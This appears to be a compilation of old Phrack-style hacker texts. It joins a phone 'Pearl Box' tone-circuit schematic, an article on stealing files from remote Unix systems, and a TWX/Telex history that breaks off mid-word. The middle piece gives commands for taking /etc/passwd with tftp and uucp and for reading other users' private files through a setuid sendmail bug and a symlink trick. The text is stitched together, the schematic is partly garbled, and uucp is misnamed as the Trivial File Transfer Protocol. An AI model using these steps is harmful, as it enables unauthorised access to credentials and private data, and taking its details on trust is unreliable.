A Pearl Box can be used to create any tone you wish that other boxes may not. It
also has a tone sweep option that can be used for numerous things like detecting
different types of phone tapping
devices.
Parts List:
· CD4049 RCA integrated circuit
· .1 uF disk capacitor
· 1 uF 16V electrolitic capacitor
· 1K resistor
· 10M resistor
· 1Meg pot
· 1N914 diode
· Some SPST momentary push-button switches
· 1 SPDT toggle switch
· 9 Volt battery & clip and miscellaneous stuff you should have laying around
the house.
State-of-the-Art-Text Schematic:
+ 16V 1uF -
_______________________________||_____
| ! ! || | _
| _______________________ |__________| |/| 8ohms
____|__|_____:__|__:__|_ | __________| | |
| 9 10 11 12 13 14 15 16 | | | |_|\|
| CD4049UBE | | |
|_1__2__3__4__5__6__7__8_| : | _
| | |__| |__| | |____________________|_________[-]
| | ! ! : [b]
| |__________________________| [a]
| : : | [t]
| ! 1N914 ! ! [t]
|___________|/|_____________________________________[+]
: |\| : :
| | |
| 10M | |
|___/\/\/\__| |
| | |
|_____||____| | <-- These 2 wires to the center pole
|| | | of switch.
.1uF 50V | |
| |
_______________________| |_____________________________
| ___[Toggle Switch]____________ |
| | | ___ |
| | | o o |
| | | /\/\/\___| |__|
|_/\/\/\____/\/\/\ | | ^ |
1K ^ | |____| ___ |
|___| | o o |
| /\/\/\___| |__|
126. Phrack Magazine - Vol. 3, Issue 28 by Dark OverLord
There are many ways of getting copies of files from a remote system that you do
not have permission to read or an account on login on to and access them
through. Many administrators do not even
bother to restrict many access points that you can use.
Here are the simplest ways:
1. Use uucp(1) [Trivial File Transfer Protocol] to retrieve a copy of a file if
you are running on an Internet based network.
2. Abuse uucp(1) [Unix to Unix Copy Program] to retrieve a copy of a file if
uucp connections are running on that system.
3. Access one of many known security loopholes.
In the following examples, we will use the passwd file as the file to acquire
since it is a readable file that can be found on most systems that these attacks
are valid on.
Method A :
1. First start the tftp program:
Enter the command:
tftp
[You have the following prompt:]
tftp>
2. The next step is to connect to the system that you wish to retrieve files
from. At the tftp, type:
tftp> connect other.system.com
3. Now request the file you wish to get a copy of (in our case, the passwd file
/etc/passwd ):
tftp> get /etc/passwd /tmp/passwd
[You should see something that looks like the following:]
Received 185659 bytes in 22 seconds.
4. Now exit the tftp program with the "quit" command:
tftp> quit
You should now have a copy of other.system.com's passwd file in your directory.
NOTE: Some Unix systems' tftp programs have a different syntax. The above was
tested under SunOS 4.0
For example, on Apollos, the syntax is:
tftp -{g|g!|p|r|w} <local file> <host> <foreign file> [netascii|image]
Thus you must use the command:
tftp -g password_file networked-host /etc/passwd
Consult your local "man" pages for more info (or in other words RTFM).
At the end of this article, I will include a shell script that will snarf a
password file from a remote host. To use it type:
gpw system_name
Method B :
Assuming we are getting the file /etc/passwd from the system uusucker, and our
system has a direct uucp connection to that system, it is possible to request a
copy of the file through the uucp links.
The following command will request that a copy of the passwd file be copied into
uucp's home directory /usr/spool/uucppublic :
uucp -m uusucker!/etc/passwd '>uucp/uusucker_passwd'
The flag "-m" means you will be notified by mail when the transfer is completed.
Method C:
The third possible way to access the desired file requires that you have the
login permission to the system.
In this case we will utilize a well-known bug in Unix's sendmail daemon.
The sendmail program has and option "-C" in which you can specify the
configuration file to use (by default this file is /usr/lib/sendmail.cf or
/etc/sendmail.cf). It should also be noted that the diagnostics
outputted by sendmail contain the offending lines of text. Also note that the
sendmail program runs setuid root.
The way you can abuse this set of facts (if you have not yet guessed) is by
specifying the file you wish read as the configuration file. Thus the command:
sendmail -C/usr/accounts/random_joe/private/file
Will give you a copy of random joe's private file.
Another similar trick is to symlink your .mailcf file to joe's file and mail
someone. When mail executes sendmail (to send the mail), it will load in your
mailcf and barf out joe's stuff.
First, link joe's file to your .mailcf .
ln -s /usr/accounts/random_joe/private/file $HOME/.mailcf
Next, send mail to someone.
mail C488869@umcvmb.missouri.edu
127.Phrack Magazine - Vol. 3, Issue 30 by Phone Phanatic
"Until a few years ago -- maybe ten -- it was very common to
see TWX and Telex machines in almost every business place."
There were only minor differences between Telex and TWX. The biggest difference
was that the former was always run by Western Union, while the latter was run by
the Bell System for a number of
years. TWX literally meant "(T)ype(W)riter e(x)change," and it was Bell's answer
to competition from Western Union. There were "three row" and "four row"
machines, meaning the number of keys
on the keyboard and how they were laid out. The "three row" machines were simply
part of the regular phone network; that is, they could dial out and talk to
another TWX also connected on regular
phone lines.
Eventually these were phased out in favor of "newer and more improved" machines
with additional keys, as well as a paper tape reader attachment which allowed
sending the same message repeatedly
to many different machines. These "four row" machines were not on the regular
phone network, but were assigned their own area codes (410-510-610-710-810-910)
where they still remain today.
The only way a four row machine could call a three row machine or vice-versa was
through a gateway of sorts which translated some of the character set unique to
each machine.
Western Union's network was called Telex and in addition to being able t